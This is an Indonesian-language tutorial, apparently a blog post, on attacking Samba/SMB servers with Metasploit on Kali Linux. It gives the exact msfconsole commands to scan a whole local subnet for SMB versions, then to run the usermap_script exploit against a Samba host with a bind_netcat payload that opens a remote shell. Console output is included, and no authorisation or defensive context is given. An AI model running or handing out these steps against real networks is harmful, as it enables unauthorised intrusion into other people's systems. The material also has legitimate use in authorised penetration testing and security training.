Kali Linux: Membobol Network Neighbourhood / SAMBA
Sumber: http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
Jalankan msfconsole
Ketik di console
msfconsole
Akan keluar kira-kira
Metasploit Park, System Security Interface Version 4.0.5, Alpha E Ready... > access security access: PERMISSION DENIED. > access security grid access: PERMISSION DENIED. > access main security grid access: PERMISSION DENIED....and... YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! YOU DIDN'T SAY THE MAGIC WORD! Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
yang lebih sopan, KETIK
msfconsole thankyou
Akan keluar
, , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| Validate lots of vulnerabilities to demonstrate exposure with Metasploit Pro -- Learn more on http://rapid7.com/metasploit =[ metasploit v4.11.4-2015071403 ] + -- --=[ 1467 exploits - 840 auxiliary - 232 post ] + -- --=[ 432 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
Lakukan enumerasi
KETIK
use auxiliary/scanner/smb/smb_version show options
Keluar
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads
KETIK
set RHOSTS 192.168.0.0/24 set THREADS 75 run
Hasilnya
[*] 192.168.0.7:445 could not be identified: Unix (Samba 3.6.3-31a.osstech) [*] Scanned 44 of 256 hosts (17% complete) [*] Scanned 68 of 256 hosts (26% complete) [*] Scanned 78 of 256 hosts (30% complete) [*] 192.168.0.90:445 is running Windows 7 Professional SP1 (build:7601) (name:HP-PC) (domain:WORKGROUP) [*] Scanned 152 of 256 hosts (59% complete) [*] Scanned 153 of 256 hosts (59% complete) [*] 192.168.0.221:445 could not be identified: Unix (Samba 3.0.37) [*] Scanned 156 of 256 hosts (60% complete) [*] Scanned 205 of 256 hosts (80% complete) [*] Scanned 227 of 256 hosts (88% complete) [*] Scanned 231 of 256 hosts (90% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
exploit
KETIK
use exploit/multi/samba/usermap_script show options
Keluar
Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port Exploit target: Id Name -- ---- 0 Automatic
KETIK
set RHOST 192.168.0.7 set payload cmd/unix/bind_netcat exploit
Jika sudah selesai
quit
Referensi
- http://www.elithecomputerguy.com/2013/01/22/hacking-samba-smb-servers-in-metasploit/
- infosecninja.blogspot.co.id/2013/07/penetration-testing-samba-server.html